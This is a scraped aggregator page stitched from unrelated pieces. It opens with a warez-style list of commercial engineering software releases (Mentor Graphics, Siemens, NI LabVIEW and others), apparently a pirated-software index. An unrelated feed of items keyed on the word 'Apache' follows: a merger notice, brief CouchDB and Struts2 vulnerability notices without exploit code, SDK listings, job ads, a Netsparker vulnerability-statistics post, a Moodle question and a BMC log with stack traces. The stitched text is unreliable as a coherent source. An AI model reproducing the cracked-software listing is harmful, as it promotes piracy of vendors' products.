FEI.Avizo.v9.0.1.Win32_64Linux.X64MACOSX
FIDES-DV.FIDES.CantileverWall.v2015.117 
FIDES-DV.FIDES.Flow.v2015.050
FIDES-DV.FIDES.GroundSlab.v2015.050 
FIDES-DV.FIDES.PILEPro.v2015.050 
FIDES-DV.FIDES.Settlement.2.5D.v2015.050
FIDES-DV.FIDES.Settlement.v2015.050 
FIDES-DV.FIDES.SlipCircle.v2015.050
FIDES-DV.FIDES.BearingCapacity.v2015.050
Global Mapper 16.2.5 Build 081915 x86x64
Graitec OMD v2015
rsnetworx for controlnet v11 cpr9 sr5
Harlequin Xitron Navigator v9 x32x64
HDL Works HDL Companion 2.8 R2 WinLnxx64
HDL Works IO Checker 3.1 R1 WinLnx64
HDL.Works.HDL.Design.Entry.EASE.v8.2.R6.for.Winlnx64
HEEDS.MDO.2015.04.2.Win32_64.&Linux64
Honeywell UniSim Design R430 English
thermoflow v24
Lakes Environmental AERMOD View v8.9.0
Lakes Environmental ARTM View v1.4.2
Lakes Environmental AUSTAL View v8.6.0
Mastercam.X9.v18.0.14020.0.Win64
McNeel.Rhinoceros.v5.0.2.5A865.MacOSX
McNeel.Rhinoceros.v5.SR12.5.12.50810.13095
Mintec.MineSight.3D.v7.0.3
MXGPs for ArcGIS v10.2 and v10.3
Moldex3D R13.0 SP1 x64
Mosek ApS Mosek v7.1 WinMacLnx
Midas.Civil.2006.v7.3.Win
NI Software Pack 08.2015 NI LabVIEW 2015
NI.LabVIEW.MathScript.RT.Module.v2015
NI.LabVIEW.Modulation.Toolkit.v2015
NI.LabVIEW.VI.Analyzer.Toolkit.v2015
NI.SignalExpress.v2015
NI.Sound.and.Vibration.Toolkit.v2015
NewTek.LightWave3D.v2015.2.Win32_64
NI LabWindows CVI 2015
HoneyWell Care v10.0
PACKAGE POWER Analysis Apache Sentinel v2015
Petrosys v17.5
Plexim Plecs Standalone 3.7.2 WinMacLnx
Power ProStructures V8i v08.11.11.616
Provisor TC200 PLC
Processing Modflow(PMWIN) v8.043
Proteus 8.3_SP1
QPS.Fledermaus.v7.4.4b.Win32_64
Siemens NX v10.0.2 (NX 10.0 MR2) Update Only Linux64
SIMULIA Isight v5.9.4 Win64 & Linux64
SIMULIA TOSCA Fluid v2.4.3 Linux64
SIMULIA TOSCA Structure v8.1.3 Win64&Linux64
Resolume Arena v4.2.1
Siemens Solid Edge ST8 MP01
TDM.Solutions.RhinoGOLD.v5.5.0.3
The.Foundry.NukeStudio.v9.0V7.Win64
Thinkbox Deadline v7.1.0.35 Win
ThirdWaveSystems AdvantEdge 6.2 Win64
Tecplot.360.EX.2015.R2.v15.2.1.62273.Win64
VERO SURFCAM 2015 R1
WAsP v10.2
Trimble.Inpho.SCOP++.5.6.x64         
Trimble.Inpho.TopDM.5.6.x64
Mentor.Graphics.FloEFD v15.0.3359.Suite.X64
Mentor Graphics FloTHERM Suite v11.1 Win32_64
Mentor.Graphics.FloTHERM.XT.2.3.Win64
Mentor_Graphics_HyperLynx v9.2 &Update1 Win32_64
Mentor.Graphics.FloVENT v11.1 Win32_64
Mentor.Graphics.FloMCAD Bridge 11.0 build 15.25.5
Mentor.Graphics.FloVIZ 11.1 Win32_64
Mentor.Graphics.FloTHERM PCB 8.0
Mentor.Graphics.Tanner.Tools.16.30.Win


          Apache, KAAC to form $3.5-billion pure-play Permian midstream C-corp      Cache   Translate Page   Web Page Cache   

Apache Corp. will contribute its midstream assets at Alpine High to Altus Midstream LP, a partnership jointly owned by Apache and Kayne Anderson Acquisition. At closing, KAAC will be renamed Altus Midstream Co., a C-corporation anchored by substantiall...

The post Apache, KAAC to form $3.5-billion pure-play Permian midstream C-corp appeared first on The Talley Group.


          Vuln: Apache CouchDB CVE-2018-11769 Remote Code Execution Vulnerability      Cache   Translate Page   Web Page Cache   
Apache CouchDB CVE-2018-11769 Remote Code Execution Vulnerability
          Dracoon Crypto Java SDK      Cache   Translate Page   Web Page Cache   
The Dracoon Crypto Java SDK adds secured data management functionalities to business oriented environments. This SDK is intended to help integrate client-side encryption. Java 6 or later is required.
Dracoon
SDK Image: 
Deadpool: 
0
SDK Provider: 
Related Platform / Languages: 
Primary category: 
Secondary category: 
Device-Specific: 
No
Is This an Unofficial SDK?: 
No
Restricted Access ( Requires Provider Approval ): 
Yes
Is the SDK Source Code Non-Proprietary ?: 
Yes
Version: 
1.0.1
SDK does not belong to a Company: 
0
Type of License if Non-Proprietary: 
Apache License 2.0

          Dracoon Crypto Swift SDK      Cache   Translate Page   Web Page Cache   
The Dracoon Crypto Swift SDK adds secured data management functionalities to business oriented environments. This SDK is intended to help integrate client-side encryption. Xcode 7.3.1 or newer is required.
Dracoon
SDK Image: 
Deadpool: 
0
SDK Provider: 
Related Platform / Languages: 
Primary category: 
Secondary category: 
Device-Specific: 
No
Is This an Unofficial SDK?: 
No
Restricted Access ( Requires Provider Approval ): 
Yes
Is the SDK Source Code Non-Proprietary ?: 
Yes
SDK does not belong to a Company: 
0
Type of License if Non-Proprietary: 
Apache License 2.0

          Dracoon Crypto C# SDK      Cache   Translate Page   Web Page Cache   
The Dracoon Crypto C# SDK adds secured data management functionalities to business oriented environments. This SDK is intended to help integrate client-side encryption. The latest version is 1.0.1.
Dracoon
SDK Image: 
Deadpool: 
0
SDK Provider: 
Related Platform / Languages: 
Primary category: 
Secondary category: 
Device-Specific: 
No
Is This an Unofficial SDK?: 
No
Restricted Access ( Requires Provider Approval ): 
Yes
Is the SDK Source Code Non-Proprietary ?: 
Yes
Version: 
1.0.1
SDK does not belong to a Company: 
0
Type of License if Non-Proprietary: 
Apache License 2.0

          Dracoon Java SDK      Cache   Translate Page   Web Page Cache   
This Dracoon Java SDK adds secured data management functionalities to business oriented environments. Java 6+ is required.
Dracoon
SDK Image: 
Deadpool: 
0
SDK Provider: 
Related Platform / Languages: 
Primary category: 
Secondary category: 
Device-Specific: 
No
Is This an Unofficial SDK?: 
No
Restricted Access ( Requires Provider Approval ): 
Yes
Is the SDK Source Code Non-Proprietary ?: 
Yes
Version: 
1.0.0
SDK does not belong to a Company: 
0
Type of License if Non-Proprietary: 
Apache License 2.0

          DevOps Engineer - ROZEE.PK - Lahore      Cache   Translate Page   Web Page Cache   
MySQL database administration. Linux (Ubuntu, CentOS) and FreeBSD administration. Installation, administration and securing web servers e.g Apache, Nginx etc....
From Rozee - Mon, 06 Aug 2018 10:44:23 GMT - View all Lahore jobs
          Senior DevOps Engineer - ROZEE.PK - Lahore      Cache   Translate Page   Web Page Cache   
MySQL database administration. Linux (Ubuntu, CentOS) and FreeBSD administration. Installation, administration and securing web servers e.g Apache, Nginx etc....
From Rozee - Fri, 03 Aug 2018 16:46:49 GMT - View all Lahore jobs
          How to block all but LAN traffic on Apache      Cache   Translate Page   Web Page Cache   
If you need to limit traffic to Apache, Jack Wallen shows you how to use the Require directive to manage who can see your site.
          Hadoop Developer with Java - Allyis Inc. - Seattle, WA      Cache   Translate Page   Web Page Cache   
Working knowledge of big data technologies such as Apache Flink, Nifi, Spark, Presto, Elastic Search, DynamoDB and other relational data stores....
From Dice - Sat, 28 Jul 2018 03:49:51 GMT - View all Seattle, WA jobs
          Sr Software Engineer - Hadoop / Spark Big Data - Uber - Seattle, WA      Cache   Translate Page   Web Page Cache   
Under the hood experience with open source big data analytics projects such as Apache Hadoop (HDFS and YARN), Spark, Hive, Parquet, Knox, Sentry, Presto is a...
From Uber - Sun, 13 May 2018 06:08:42 GMT - View all Seattle, WA jobs
          Software Development Engineer - Big Data Platform - Amazon.com - Seattle, WA      Cache   Translate Page   Web Page Cache   
Experience with Big Data technology like Apache Hadoop, NoSQL, Presto, etc. Amazon Web Services is seeking an outstanding Software Development Engineer to join...
From Amazon.com - Wed, 08 Aug 2018 19:26:05 GMT - View all Seattle, WA jobs
          Sr. Technical Account Manager - Amazon.com - Seattle, WA      Cache   Translate Page   Web Page Cache   
You can also run other popular distributed frameworks such as Apache Spark, Apache Flink, and Presto in Amazon EMR;...
From Amazon.com - Wed, 01 Aug 2018 01:21:56 GMT - View all Seattle, WA jobs
          (USA-MI-Rochester) Developer Analyst      Cache   Translate Page   Web Page Cache   
## Minimum Qualifications Bachelor’s degree in Computer Science, Information Systems, Information Technology, closely related field, or an equivalent combination of education and/or experience. One year experience in enterprise applications problem-solving, application development using an object-oriented language, web languages, and scripting. Ability to work independently and routinely update director on results. Ability to contribute to group projects and work collaboratively as a member of a strong technical team. Strong problem-solving skills. Flexibility in work schedule; willingness to occasionally adjust work hours for the maintenance window is required: on Wednesdays between midnight and 8 A.M.; Tuesdays, Wednesdays, and Thursdays 3 times a year between semesters; fiscal year end June 30 and July 1; and a few limited weekends as determined. Ability to travel for education, professional development, or conferences. Excellent problem-solving, organizational, and analytical skills. Excellent oral and written communication skills. Work sample should include a written document of anything related to this line of work. ## Desired Qualifications Knowledge of the following programming languages and tools is desired: Java, PHP, HTML, JavaScript, CSS, SQL, PL/SQL. Familiarity with scripting, working with web application servers (Apache Tomcat), databases (PostgreSQL, Oracle) and support tools (Git, Maven, Gradle). ## All Qualifications Unless otherwise required by an applicable collective bargaining agreement, all minimum, additional and desired qualifications are preferred, but qualifications, degrees, and/or experience deemed comparable and/or equivalent by Oakland University in its sole and exclusive discretion may be considered. ## Position Purpose University Technology Services seeks an energetic and highly skilled developer for work on a variety of core enterprise application systems and solutions in support of the university mission. This position is involved with exciting technical projects using current software and development tools. Also, the individual contributes to team research and selection of emerging technologies used to enhance Banner (the university ERP) and provide interfaces with other third party systems. The incumbent is a member of a team that performs development, testing, troubleshooting, and user support of new processes, upgrades, and new application development. *Position Number:* 990020 *Requisition No.:* S00950 *Salary Range/Pay Rate:* Salary commensurate with education and experience. *Position Notes:* Compensation commensurate with education and experience. For more information on Oakland University’s salary structure and fringe benefits, please go to our website at http://www.oakland.edu/uhr/benefits *Employee Group/Grade:* AP Band R *Job Category:* Administrative-Professional *Work Schedule:* FT/Reg (40 hours) *Shift/Days:* This is a full time position. Two positions available. First consideration will be given to those who apply by August 22, 2018. *Pay Schedule:* Month *Number of Hrs./Wk.:* 40 *Job Open Date:* 08/09/2018 *Position Title:* Developer Analyst
          (USA-MO-St. Louis) Web Middleware Analyst      Cache   Translate Page   Web Page Cache   
**Your Role:** As a Senior Middleware Analyst you will provide support for Production public ECommerce platforms and support the back-end applications including troubleshooting & performance evaluation using testing & monitoring tools such as ALM, APMs such as DynaTrace, Nagios and other custom toolsets. You will have Middleware ownership, often coordinating several development teams, dependencies to diagnose problems across tiers and support teams. This role also includes managing deployments, upgrades, coordinating with infrastructure teams. Collaboration with offshore team members & teams in other timezones. Automation & monitoring via APM tools, shell scripting, unit testing and other scripting tools. You will also perform builds/deploys, assisting with version control and release testing. Moving release processes towards a model of continuous development & integration using tools such as Jenkins, JIRA, BitBucket, pipelines, CI and other DevOps fundamentals. Ability to quickly learn & understand sometimes open-source or community frameworks & functionality as they are released is key. **Who You Are:** **Basic Qualifications:** * Bachelor's degree in a related fieldand 4+ years of direct experience in middleware support role with hands-on configuration, monitoring & troubleshooting in a java-based application server environment **Preferred Qualifications: ** * Working knowledge of Java application server mgmt. (e.g. WebSphere, Wildfly) * Application containerization (e.g. Docker, Google/GKE, Kubernetes) * Networking firewall, load balancing concepts pertaining to enterprise application support (e.g. HA, DMZ) * Basic Unix administration tasks including shell scripting, other scripting ideal (e.g. Perl) * Database interaction, including NoSQL (e.g. Cassandra) * Messaging & ESB management (e.g. MQSeries, ActiveMQ, Apache Camel, IBM Message Broker ,Kafka) *Job Requisition ID:* 180071 *Location:* St. Louis *Career Level:* D - Professional (4-9 years) *Working time model:* full-time
          Valick написал(а) в теме: Длительное выполнение скрипта      Cache   Translate Page   Web Page Cache   
При чём тут set_time_limit(0) и таймаут соединения? РНР вообще плевать потерялось у вас соединение или нет, за это отвечает Apache, РНР продолжает работать отведённое ему время для скрипта. Я же вам рассказал как следует поступить. Отправляйте запросы на сервер например раз в 10 секунд и проверяйте готов файл или нет (ну и обработка ошибок тоже должна быть), как будет готов отдавайте на скачивание.
          Data Pipeline: Send Logs From Kafka to Cassandra      Cache   Translate Page   Web Page Cache   

In this post, I will outline how I created a big data pipeline for my web server logs using Apache Kafka, Python, and Apache Cassandra.

In past articles I described how to install and configure Apache Kafka and Apache Cassandra. I assume that you already have a Kafka broker running with a topic of www_logs and a production ready Cassandra cluster running. If you don't then please follow the articles mentioned in order to follow along with this tutorial.


          State of Security for Open Source Web Applications 2018      Cache   Translate Page   Web Page Cache   

Infographic highlighting the State of Security for Open Source Web Applications 2018Each year, we publish a set of statistics summarizing the vulnerabilities we find in open source web applications. Our tests form part of Netsparker's quality assurance practices, during which we scan thousands of web applications and websites. This helps us to add to our security checks and continuously improve the scanner's accuracy.

This blog post includes statistics based on security research conducted throughout 2017. But first, we take a look at why we care about open source applications, and the damage that can be caused for enterprises when they go wrong.

Why Do Workplaces Use Open Source Software?

The reason for the rise in popularity of open source software in the business world is financial: your enterprise is getting great software for free. Some enterprises resonate with the open source philosophy of collaboration and giving back. This helps explain why big companies like Twitter, Tumblr, Netflix and Pinterest use and advocate for open source.

Netsparker has a natural interest in the security aspect of open source software, and also a very question; since the source code of open source projects is publically available, does that make these applications more or less secure than proprietary or closed software?

What Happens When Open Source Goes Wrong?

The global average cost of a data breach in 2017 was $3.62 million. In May to July of 2017, Equifax suffered a massive cyber-security breach, with attackers accessing hundreds of millions of customers' personal data. Although they announced this breach in September 2017, Equifax was informed in 2016 that their website was vulnerable, and was even told which vulnerabilities to check.

Hackers exploiting open source Apache Struts vulnerabilities were blamed for the Equifax breach. Although a deserialization vulnerability in the REST plugin of Apache Struts was initially blamed, an OGNL Expression Injection vulnerability in Struts was found to be the cause for the breach.

Even though a vast amount of personal data was being exposed due to the Equifax breach, a significantly higher number of users were potentially affected by another security bug in readily available open source software. ROBOT (Return Of Bleichenbacher's Oracle Threat) is a type of attack that revives a 19-year old vulnerability. Bleichenbacher’s RSA vulnerability is still very prevalent in the Internet and affected top domains like Facebook and Paypal, along with many other vendors and open source projects. In December 2017, Netsparker released a hotfix version of our web application security scanner that included ROBOT security checks.

Why Does Netsparker Care About Open Source?

One of the best ways to demonstrate the effectiveness of Netsparker web application security scanner is to test it against a wide variety of web applications used on the web. So our security researchers scan a great variety of open source web applications including: shopping carts and e-commerce solutions, social networking web applications, forums and blogs. The complexity of the testing environment increases when you consider the big number of languages used to create web applications, such as: PHP, Java, Ruby on Rails, ASP.NET, Node.JS, Python and other frameworks.

The only reason – aside from an awesome team of dedicated Security Researchers – that we are able to scan so many web applications and detect so many vulnerabilities across such a wide range, is because automation is at the heart of the Netsparker's web application security scanning technology.

There are a couple of neat side benefits. Open source applications development teams get free security testing, empowering them to write more secure code. If you'd like to conduct your own, free, automated web application security testing, and read more about how we're huge supporters of the open source community, see our offer of Free Online Web Security Scans For Open Source Projects.

What Did Netsparker Discover About the State of Open Source Security In 2017?

What Is The Most Prolific Vulnerability in Open Source Applications?

The most predominant vulnerability discovered in open source web applications was Reflected XSS. This accounted for almost 70% of the overall number of reported vulnerabilities. All kinds of Cross-site Scripting (XSS) vulnerabilities ranked as number seven in the OWASP Top 10 List for 2017.

How Many Web Applications Did We Scan in 2017?

  • The total number of web applications we tested and scanned in 2017 was 154, an increase of over 48% from our last report
  • The most popular web application frameworks or languages in which scanned apps were developed are PHP (124), .NET (14) and Java (10)
  • The most popular back-end database servers used by these scanned applications were MySQL (86), Microsoft SQL Server (13)

How Many Web Applications Did We Scan in 2017?

What Were the Vulnerability Findings for 2017?

What is of most interest to us is the numbers of vulnerabilities we found in these web applications.

  • The number of vulnerable web applications was 59. This is over 38% of all the web applications we tested.
  • The total number of vulnerabilities Netsparker identified in these open source sites was 346.

Which Vulnerability Types Were Detected?

The web application vulnerabilities Netsparker discovered are listed in the table below.

Vulnerability Name Total Occurrences Severity Level
Reflected Cross-site Scripting (XSS) 240 High Severity
Frame Injection 29 Medium Severity
SQL Injection 24 Critical Severity
Stored Cross-site Scripting (XSS) 15 High Severity
Blind SQL Injection 14 Critical Severity
Code Evaluation 6 Critical Severity
Cross-Site Request Forgery (CSRF) 5 Low Severity
Open Redirection 5 Medium Severity
Boolean SQL Injection 3 Critical Severity
Blind Cross-site Scripting (XSS) 2 High Severity
Cross-site Scripting (XSS) via Remote File Inclusion (RFI) 1 High Severity
Server Side Template Injection (SSTI) 1 High Severity
Document Object Model Cross-site Scripting (DOM XSS) 1 High Severity

Around 88% of the total vulnerabilities were either of Critical or High Severity. For more information on how Netsparker defines severity levels, see Web Application Vulnerabilities Severities Explained.

What Were the Vulnerability Findings for 2017?

How Has the State of Web Application Security Changed Since 2016?

Compared to our findings from last year's open source testing (see our previous Statistics About the Security State of 104 Open Source Web Applications), it's clear that XSS vulnerabilities remain, by far, the most common type of vulnerability to be found in open source web applications. The reason for this is that developers who are keen to provide rich interaction in modern web applications use JavaScript in the client-side.

Whereas last year SQL Injection vulnerabilities came in second place, this year Frame Injection vulnerabilities have replaced them. The top development languages, frameworks and database servers remains the same.

How Has the State of Web Application Security Changed Since 2016?

What Action Did the Open Source Applications Take?

If you consult our Web Application Advisories by Netsparker list, you can see that we published 32 advisories in 2017. In addition, there are 28 in pending mode. Of these 32, 28 vendors were contacted. Out of the 59 reported web applications with vulnerabilities, only six were fixed. The number of advisories with multiple vulnerabilities was three.

Would Your Open Source Project Benefit From Free Web Vulnerability Scans?

Based on our latest statistics, a randomly-selected web application may include an average of 2.25 vulnerabilities. Developers could eliminate many of these by taking security best practice into account during the SDLC.

Does your team have time to conduct penetration testing to find them all? And, do you know what to do, to remove the vulnerability, and determine whether it is gone? Would you like to have access to an automated web application security scanning solution that would detect them all – and offer remediation recommendations?

Netsparker offers Free Online Web Application Security Scans for Open Source Projects. This is our token of appreciation to all the developers in the open source community and Netsparker's way of giving back to you. Open source projects such as OpenCart have already used our free, automated web application security scans with great success. Why not you, too?

Useful Resources

Web Application Vulnerabilities Index
Web Application Advisories by Netsparker
State of Open Source Web Applications


          Build me an android app      Cache   Translate Page   Web Page Cache   
Sir, Request for Android app development: Our needs follow. A. Back end application server is web server with both apache and sockets built in using python 3.6 B. single screen for all purposes by masking non-relevant items and visible only tasks based items at appropriate times or C... (Budget: ₹12500 - ₹37500 INR, Jobs: Android, Java, Mobile App Development, Python, Software Architecture)
          Apache Struts2 Freemarker Remote Code Execution (CVE-2017-12611) - Ver2      Cache   Translate Page   Web Page Cache   
A remote code execution vulnerability exists in Apache. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.
          Grid format JPGs rended as PNGs      Cache   Translate Page   Web Page Cache   
by Matthew Cook.  

I have some courses with a grid format. 

Their grids contain pictures to illustrate the topics. These pictures display successfully on all common browsers, except Internet Explorer (version 11 tested).

The %server%/pluginfile.php/123456/course/section/12345/gridimage/picture.jpg pictures are being sent to browsers in the PNG format. Most browsers work out they should ignore the filename but IE doesn't.

Other JPGs in the course work fine.

I'm using Moodle 3.4 on Apache.

Is there any particular way the server (especially PHP) might be set up that would be having this effect?


          atsso.0.log showing BMCSSG2090W: Network error connecting with Atrium SSO server      Cache   Translate Page   Web Page Cache   

This document contains official content from the BMC Software Knowledge Base. It is automatically updated when the knowledge article is modified.


PRODUCT:

TrueSight Presentation Server


COMPONENT:

TSPS SSO Integration


APPLIES TO:

TSPS 10.5



PROBLEM:

The following errors can be seen in the atsso.0.log file

WARNING 17-02-08 14:05:49.024 com.bmc.atrium.sso.sdk.impl.BaseREST.send().Thread-214:BMCSSG2090W: Network error connecting with Atrium SSO server (returncode: -2).
SEVERE 17-02-08 14:05:49.025 com.bmc.atrium.sso.sdk.impl.BaseREST.send().Thread-214:Network retry count depleted: 6
BMCSSG2090W: Network error connecting with Atrium SSO server (returncode: -2).
com.bmc.atrium.sso.sdk.impl.BaseREST.sendRequest(Unknown Source)com.bmc.atrium.sso.sdk.impl.BaseREST.send(Unknown Source)com.bmc.atrium.sso.sdk.impl.BaseREST.sendRequest(Unknown Source)com.bmc.atrium.sso.sdk.impl.BaseREST.sendGet(Unknown Source)com.bmc.atrium.sso.sdk.impl.InfoREST.fetchReply(Unknown Source)com.bmc.atrium.sso.sdk.impl.InfoREST.fetchReply(Unknown Source)com.bmc.atrium.sso.sdk.impl.InfoREST.getVersion(Unknown Source)com.bmc.atrium.sso.sdk.impl.InfoREST.getServerVersion(Unknown Source)com.bmc.atrium.sso.sdk.impl.SSOServerImpl.getServerVersion(Unknown Source)com.bmc.truesight.api.auth.sso.SsoServerUtility.getAuthenticationObjectForSsoServer(SsoServerUtility.java:184)com.bmc.truesight.api.auth.sso.SsoAclFacade.fetchSsoAuthenticationObject(SsoAclFacade.java:223)com.bmc.truesight.api.auth.sso.SsoAclFacade.logOffUserFor(SsoAclFacade.java:525)com.bmc.truesight.api.auth.sso.rest.SSOACLRestFacade.logOffUserFor(SSOACLRestFacade.java:263)com.bmc.truesight.common.services.SSOServiceImpl.getSSOUserGroups(SSOServiceImpl.java:113)com.bmc.truesight.usermgmt.rest.providers.servicefactory.UserAccountAuthenticationExecutionService.execute(UserAccountAuthenticationExecutionService.java:188)com.bmc.truesight.usermgmt.rest.providers.UserAccountProvider.doLogin(UserAccountProvider.java:58)sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)java.lang.reflect.Method.invoke(Method.java:497)com.bmc.truesight.rest.system.InvocationOrchestrator.invoke(InvocationOrchestrator.java:71)com.sun.proxy.$Proxy108.doLogin(Unknown Source)sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)java.lang.reflect.Method.invoke(Method.java:497)org.jboss.resteasy.core.MethodInjectorImpl.invoke(MethodInjectorImpl.java:137)org.jboss.resteasy.core.ResourceMethodInvoker.invokeOnTarget(ResourceMethodInvoker.java:296)org.jboss.resteasy.core.ResourceMethodInvoker.invoke(ResourceMethodInvoker.java:250)org.jboss.resteasy.core.ResourceLocatorInvoker.invokeOnTargetObject(ResourceLocatorInvoker.java:140)org.jboss.resteasy.core.ResourceLocatorInvoker.invoke(ResourceLocatorInvoker.java:103)org.jboss.resteasy.core.SynchronousDispatcher.invoke(SynchronousDispatcher.java:356)org.jboss.resteasy.core.SynchronousDispatcher.invoke(SynchronousDispatcher.java:179)org.jboss.resteasy.plugins.server.servlet.ServletContainerDispatcher.service(ServletContainerDispatcher.java:220)org.jboss.resteasy.plugins.server.servlet.HttpServletDispatcher.service(HttpServletDispatcher.java:56)org.jboss.resteasy.plugins.server.servlet.HttpServletDispatcher.service(HttpServletDispatcher.java:51)javax.servlet.http.HttpServlet.service(HttpServlet.java:729)org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:291)org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:52)org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:239)org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)com.bmc.tsps.common.services.server.HighAvailabilityFilter.doFilter(HighAvailabilityFilter.java:29)org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:239)org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)org.apache.shiro.web.servlet.ProxiedFilterChain.doFilter(ProxiedFilterChain.java:61)org.apache.shiro.web.servlet.AdviceFilter.executeChain(AdviceFilter.java:108)org.apache.shiro.web.servlet.AdviceFilter.doFilterInternal(AdviceFilter.java:137)org.apache.shiro.web.servlet.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:125)org.apache.shiro.web.servlet.ProxiedFilterChain.doFilter(ProxiedFilterChain.java:66)org.apache.shiro.web.servlet.AbstractShiroFilter.executeChain(AbstractShiroFilter.java:449)org.apache.shiro.web.servlet.AbstractShiroFilter$1.call(AbstractShiroFilter.java:365)org.apache.shiro.subject.support.SubjectCallable.doCall(SubjectCallable.java:90)org.apache.shiro.subject.support.SubjectCallable.call(SubjectCallable.java:83)org.apache.shiro.subject.support.DelegatingSubject.execute(DelegatingSubject.java:383)org.apache.shiro.web.servlet.AbstractShiroFilter.doFilterInternal(AbstractShiroFilter.java:362)org.apache.shiro.web.servlet.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:125)org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:239)org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:212)org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:106)org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:614)org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:141)org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:79)org.apache.catalina.valves.AbstractAccessLogValve.invoke(AbstractAccessLogValve.java:616)org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:88)org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:518)org.apache.coyote.http11.AbstractHttp11Processor.process(AbstractHttp11Processor.java:1096)org.apache.coyote.AbstractProtocol$AbstractConnectionHandler.process(AbstractProtocol.java:674)org.apache.tomcat.util.net.JIoEndpoint$SocketProcessor.run(JIoEndpoint.java:277)java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142)java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:617)org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)java.lang.Thread.run(Thread.java:745)
WARNING 17-02-08 14:05:49.026 com.bmc.atrium.sso.sdk.impl.SSOServerImpl.getServerVersion().Thread-214:Failed to get version from server, assuming release 1.0: AtriumSSOException [BMCSSG2091E: Failed to connect with Atrium SSO server. Please validate server is accessible from this host.]
FINEST 17-02-08 14:05:49.027 com.bmc.atrium.sso.sdk.impl.BaseREST.sendRequest().Thread-214:Build URL request.
FINEST 17-02-08 14:05:49.027 com.bmc.atrium.sso.sdk.impl.BaseREST.sendRequest().Thread-214:/atsso/info
FINEST 17-02-08 14:05:49.027 com.bmc.atrium.sso.sdk.impl.BaseREST.sendRequest().Thread-214:Sending URL request.
FINE 17-02-08 14:05:49.028 com.bmc.atrium.sso.sdk.impl.SSOServerImpl.getHandler().Thread-214:Creating HTTPS handler that accepts all clients: https://clm-aus-009612.bmc.com:8443/atriumsso
SEVERE 17-02-08 14:05:49.037 com.bmc.atrium.sso.common.CertificateUtils.captureServerCert().Thread-214:Failed to connect with AtriumSSO server: javax.net.ssl.SSLHandshakeException: Received fatal alert: handshake_failure
    at sun.security.ssl.Alerts.getSSLException(Alerts.java:192)
    at sun.security.ssl.Alerts.getSSLException(Alerts.java:154)
    at sun.security.ssl.SSLSocketImpl.recvAlert(SSLSocketImpl.java:2023)
    at sun.security.ssl.SSLSocketImpl.readRecord(SSLSocketImpl.java:1125)
    at sun.security.ssl.SSLSocketImpl.performInitialHandshake(SSLSocketImpl.java:1375)
    at sun.security.ssl.SSLSocketImpl.startHandshake(SSLSocketImpl.java:1403)
    at sun.security.ssl.SSLSocketImpl.startHandshake(SSLSocketImpl.java:1387)
    at sun.net.www.protocol.https.HttpsClient.afterConnect(HttpsClient.java:559)
    at sun.net.www.protocol.https.AbstractDelegateHttpsURLConnection.connect(AbstractDelegateHttpsURLConnection.java:185)
    at sun.net.www.protocol.http.HttpURLConnection.getInputStream0(HttpURLConnection.java:1513)
    at sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnection.java:1441)
    at java.net.HttpURLConnection.getResponseCode(HttpURLConnection.java:480)
    at sun.net.www.protocol.https.HttpsURLConnectionImpl.getResponseCode(HttpsURLConnectionImpl.java:338)
    at com.bmc.atrium.sso.common.CertificateUtils.captureServerCert(Unknown Source)
    at com.bmc.atrium.sso.sdk.impl.SSOServerImpl.getHandler(Unknown Source)
    at com.bmc.atrium.sso.sdk.impl.BaseREST.sendRequest(Unknown Source)
    at com.bmc.atrium.sso.sdk.impl.BaseREST.send(Unknown Source)
    at com.bmc.atrium.sso.sdk.impl.BaseREST.sendRequest(Unknown Source)
    at com.bmc.atrium.sso.sdk.impl.BaseREST.sendGet(Unknown Source)
    at com.bmc.atrium.sso.sdk.impl.InfoREST.fetchReply(Unknown Source)
    at com.bmc.atrium.sso.sdk.impl.InfoREST.fetchReply(Unknown Source)
    at com.bmc.atrium.sso.sdk.impl.InfoREST.isFIPSMode(Unknown Source)
    at com.bmc.atrium.sso.sdk.impl.SSOServerImpl.isServerInFIPS140Mode(Unknown Source)
    at com.bmc.atrium.sso.sdk.impl.SSOServerImpl.checkFIPSCompat(Unknown Source)
    at com.bmc.atrium.sso.sdk.impl.SSOServerImpl.getAuthentication(Unknown Source)
    at com.bmc.truesight.api.auth.sso.SsoServerUtility.getAuthenticationObjectForSsoServer(SsoServerUtility.java:186)
    at com.bmc.truesight.api.auth.sso.SsoAclFacade.fetchSsoAuthenticationObject(SsoAclFacade.java:223)
    at com.bmc.truesight.api.auth.sso.SsoAclFacade.logOffUserFor(SsoAclFacade.java:525)
    at com.bmc.truesight.api.auth.sso.rest.SSOACLRestFacade.logOffUserFor(SSOACLRestFacade.java:263)
    at com.bmc.truesight.common.services.SSOServiceImpl.getSSOUserGroups(SSOServiceImpl.java:113)
